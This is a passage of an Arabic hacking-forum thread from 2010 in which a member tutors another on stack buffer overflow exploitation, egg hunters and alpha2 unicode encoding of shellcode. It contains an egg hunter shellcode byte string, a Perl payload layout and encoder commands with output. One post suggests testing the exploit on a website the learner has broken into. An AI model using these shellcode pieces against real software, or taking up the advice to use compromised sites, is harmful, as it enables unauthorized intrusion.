Style2

دورة بيرل


العودة   الحماية للأبد - Sec4ever > الأقسام المميزة > المواضيع المميزة

إضافة رد
 
أدوات الموضوع انواع عرض الموضوع
  #21  
قديم 31-07-2010, 12:45 AM
الصورة الرمزية MadjiX
MadjiX MadjiX متواجد حالياً
:: عضو خاص ::
 
تاريخ التسجيل: Jul 2010
المشاركات: 63
شكراً: 4
تم شكره 10 مرة في 4 مشاركة
افتراضي

لا عادي اخي

بالنسبة لسؤالك الثاني الثغرات تشتغل عادي اخي اذا رفعتها

او حطيتها بسيرفر اباتشي وخليت اي شخص يتصل بالرابط رح تشتغل

اما بالنسبة للمفتاح شايف ها*ي ببداية الشل كود %u7a44㜲穄㜲% ؟

طيب روح فكها من لهيكس الي حروف تلقى الناتج 27Dz

الحين شغلة ال egg hunter بالأسفل انو رح يبحث عن 27Dz لما يلقا هاذي الكلمة

رح يشغل الشل كود تمام طبعا انا هون فالثغرة غيرت المفتاح من w00t

المهم تحط اي كلمة يبحث عنها ال egg لما يلقاها يشغل الشل كود بعدها

بالنسبة لمشكلة ecx واله ماعرفت كيف رح ابسط لك اكثر من فوق اقرا كم مرة

ورح تفهم اي سؤال اخر انا هنا ان شاء الله
__________________

MadjiX
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل] - [فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل] - [فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل] - [فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل][فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]

رد مع اقتباس
  #22  
قديم 31-07-2010, 12:54 AM
الصورة الرمزية overflow3r
overflow3r overflow3r غير متواجد حالياً
عضو نشيط
 
تاريخ التسجيل: Jan 2010
المشاركات: 50
شكراً: 27
تم شكره 0 مرة في 0 مشاركة
افتراضي

أنا جربت أرفعها على سيرفير محلي و لم تشتغل
هل جربتها أنت؟

أه فهمت مبدأ ال egghunter يعني لما يجد 27DZ يعني أنه وجد الشل كود
لكن الegghunter بنسفه لاحظت فيه المفتاح 27DZ و إذا كان سيبحث في كامل الذاكرة فأكيد سيفحص نفسه
فكيف سيعرف إذا ما كان هو الشل كود أما لا يزال في egghunter?

بالنسبة لمشكلة ecx سأحاول أن أطلع أكثر
ممكن ترفق لنا الملف المصاب لكي نجرب؟
رد مع اقتباس
  #23  
قديم 31-07-2010, 01:02 AM
الصورة الرمزية MadjiX
MadjiX MadjiX متواجد حالياً
:: عضو خاص ::
 
تاريخ التسجيل: Jul 2010
المشاركات: 63
شكراً: 4
تم شكره 10 مرة في 4 مشاركة
افتراضي

أنت ذكي وتعجبني أسئلتك
الـ egghunter فيه 27dz
واحد فقط اما بداية الشل كود فاثنان يعني
27Dz27Dz
عندما يتكرر يعرف بانه فالمكان الصحيح
اما بالنسبة
لل سيرفر والثغرة فتشتغل شف موقع انت مخترقه
وارفع عليه لصفحة وردلي بالخبر
وانا ارفقت كل شيء استعملته فالشرح
في ها*ا الرد

اقتباس:
المشاركة الأصلية كتبت بواسطة MadjiX مشاهدة المشاركة
البرنامج المصاب فيجوال بيسك
بصح تقدر تفحص الملف dll المصاب مايحتاجش كل البرنامج
الملف المصاب رفعتو ليك هنا
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]
اما ابرنامج لي كنت نفحص بيه
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]
أما البرنامج نتاع التنقيح i
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]

اما الريموت ديسكتوب نتاعك لي عطيتهولي :D
هاذا اسمو vmware
__________________

MadjiX
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل] - [فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل] - [فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل] - [فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل][فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]

رد مع اقتباس
  #24  
قديم 31-07-2010, 01:19 AM
الصورة الرمزية MadjiX
MadjiX MadjiX متواجد حالياً
:: عضو خاص ::
 
تاريخ التسجيل: Jul 2010
المشاركات: 63
شكراً: 4
تم شكره 10 مرة في 4 مشاركة
افتراضي

ببساطة اكثر ا*ا مافهمت
ال egg hunter رح يبحث عن w00tw00t مش w00t
لها*ا بنحطها مكررة قبل الشل كود اما فال egg تكون واحدة بس
شف هون ها*ا مثال عن egg

كود:
my $egghunter ="\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8".
"w00t"
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";
اما الاستغلال رح يكون

كود:
my $payload=$junk.$eip.$egghunter.$padding."w00tw00t".$shellcode;
كمثال

والله الخطا مني لاني كاتب بالرد يبحث عن 27Dz
كنت شرحت كل شيء من الاول كان افضل انا والله من الاول حطيت الدرس
لمستوى متقدم بس معلش نحن فالخدمة ^^
__________________

MadjiX
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل] - [فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل] - [فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل] - [فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل][فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]


رد مع اقتباس
  #25  
قديم 01-08-2010, 03:15 PM
الصورة الرمزية overflow3r
overflow3r overflow3r غير متواجد حالياً
عضو نشيط
 
تاريخ التسجيل: Jan 2010
المشاركات: 50
شكراً: 27
تم شكره 0 مرة في 0 مشاركة
افتراضي

بارك الله فيك
هل ممكن تقول لنا كيفية تصنع egghunter unicode?
رد مع اقتباس
  #26  
قديم 01-08-2010, 05:01 PM
الصورة الرمزية MadjiX
MadjiX MadjiX متواجد حالياً
:: عضو خاص ::
 
تاريخ التسجيل: Jul 2010
المشاركات: 63
شكراً: 4
تم شكره 10 مرة في 4 مشاركة
افتراضي

عادي اخي تجيب egg hunter
وتعمله ب alpha2 encode
رح ينتجلك egg hunter unicode
__________________

MadjiX
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل] - [فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل] - [فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل] - [فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل][فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]

رد مع اقتباس
  #27  
قديم 01-08-2010, 05:09 PM
الصورة الرمزية overflow3r
overflow3r overflow3r غير متواجد حالياً
عضو نشيط
 
تاريخ التسجيل: Jan 2010
المشاركات: 50
شكراً: 27
تم شكره 0 مرة في 0 مشاركة
افتراضي

إذا ممكن أخي تعمل شرح كتابي بسيط في الرد حول الطريقة لأني لم أعرف كيف أبدأ
رد مع اقتباس
  #28  
قديم 01-08-2010, 05:26 PM
الصورة الرمزية MadjiX
MadjiX MadjiX متواجد حالياً
:: عضو خاص ::
 
تاريخ التسجيل: Jul 2010
المشاركات: 63
شكراً: 4
تم شكره 10 مرة في 4 مشاركة
افتراضي

طيب انا ارفقتلك اداة alpha في الرد اعملها compile
وروح لمكانها وحط هاذا الامر
كود:
./alpha eax --unicode --uppercase < /home/madjix/Desktop/overflower.bin
وطبعا من دون ماشرح حط ال egg في ها* الملف overfow3r.bin وها*ي عملتها الحين بس للشرح
كود:
madjix@Dz:~/Desktop$ vim Test.bin 
MadjiX-*/"'àçOverflow3r
madjix@Dz:~/Desktop$ ./alpha eax --unicode --uppercase < /home/madjix/Desktop/Test.bin
PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIA
QAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAI
QI1111AIAJQI1AYAZBABABABAB30APB944JBPMQQ342JS9P
XNMNJNOMRMWXCEPXCVG0ORVC5BR36RL2OD7OCRRLJA
vim لقراءة مايوجد ب Test.bin
والامر الثاني لعمل ال encode alpha

أي سؤال اخر لا تردد مارح اتركك حتى نشوف اسمك في exploit-db :D
الملفات المرفقة
نوع الملف: zip alpha2.c.zip‏ (4.7 كيلوبايت, المشاهدات 0)
__________________

MadjiX
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل] - [فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل] - [فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل] - [فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل][فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]


رد مع اقتباس
  #29  
قديم 01-08-2010, 05:53 PM
الصورة الرمزية overflow3r
overflow3r overflow3r غير متواجد حالياً
عضو نشيط
 
تاريخ التسجيل: Jan 2010
المشاركات: 50
شكراً: 27
تم شكره 0 مرة في 0 مشاركة
افتراضي

لا أدري ماذا أقول لك الله يجازيك خيرا على هذا الرد

ينقص فيه شيء واحد أظن و هو egg يا ريت ترفقه
رد مع اقتباس
  #30  
قديم 01-08-2010, 05:58 PM
الصورة الرمزية MadjiX
MadjiX MadjiX متواجد حالياً
:: عضو خاص ::
 
تاريخ التسجيل: Jul 2010
المشاركات: 63
شكراً: 4
تم شكره 10 مرة في 4 مشاركة
افتراضي

ال egg في كثير تقدر تجيبهم من اي مكان وتعملهم encode
يصيرو unicode بس اذا عملتلك انا egg رح يكون eax او ecx
يعني رح عمله على اي محرر لهاذا خليتك انت الي تعمله لانو يختف
من ثغرة الى اخرى اختلاف في المحرر انت شوفت الامر انا حطيت eax
للتجربة بس انت في ثغرتك رح يختلف

أنت اعمل بهاذا
ينفع
كود:
my $egghunter ="\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8".
"w00t"
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";
__________________

MadjiX
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل] - [فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل] - [فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل] - [فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل][فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]


رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
شرح فحص وكتابة استغلال Stack Buffer Overflow شــامل MadjiX المواضيع المميزة 31 06-09-2010 11:48 PM
فيديو يشرح استغلال ثغرة في متصفحات ie6 ,7 & 8 بالميتاسبلوات Sec4ever أساسيات حماية المواقع والسيرفرات - Bases of Protection sites and servers 4 27-07-2010 08:17 PM
سكريبت من اجل التعلم على استغلال الثغرات و تجريب الأستغلال Sec4ever أساسيات حماية المواقع والسيرفرات - Bases of Protection sites and servers 11 14-07-2010 03:25 PM
فيديو شرح استغلال ثغرة توقف Windows 7 Sec4ever أساسيات حماية المواقع والسيرفرات - Bases of Protection sites and servers 5 07-06-2010 12:08 AM
كتاب اتقان استعمال ال xml مع ال php Sec4ever :: قسم الكتب الألكترونية E-books :: 4 04-02-2010 12:40 PM



حماية المواقع

اختراق المواقع

حماية الأجهزة

اختراق الأجهزة

الحماية للأبد

تشفير و فك تشفير

المواقع بنفس الدورك

مسار لوحة الأدمن

مواقع على نفس الIP

الحماية للأبد

حماية السكريبتات

اختراق السكريبتات

اكتشاف الثغرات

ترقيع الثغرات

الحماية للأبد

الحماية للأبد

الحماية للأبد

الحماية للأبد

الحماية للأبد

الحماية للأبد

الحماية للأبد

الحماية للأبد

سكيوورتى وور

باك تراك العرب

طلبة الجزائر

Add to My Yahoo!

Add to Google!

Add to AOL!

Add to MSN

Add to Windows Live

Free Page Rank Tool



الساعة الآن 09:34 PM


Powered by vBulletin® Copyright ©2000 - 2010, Jelsoft Enterprises Ltd.

:: Security By : Sec4ever Team ::

Copyright © 2008-2010 - Sec4ever Nassim. All rights reserved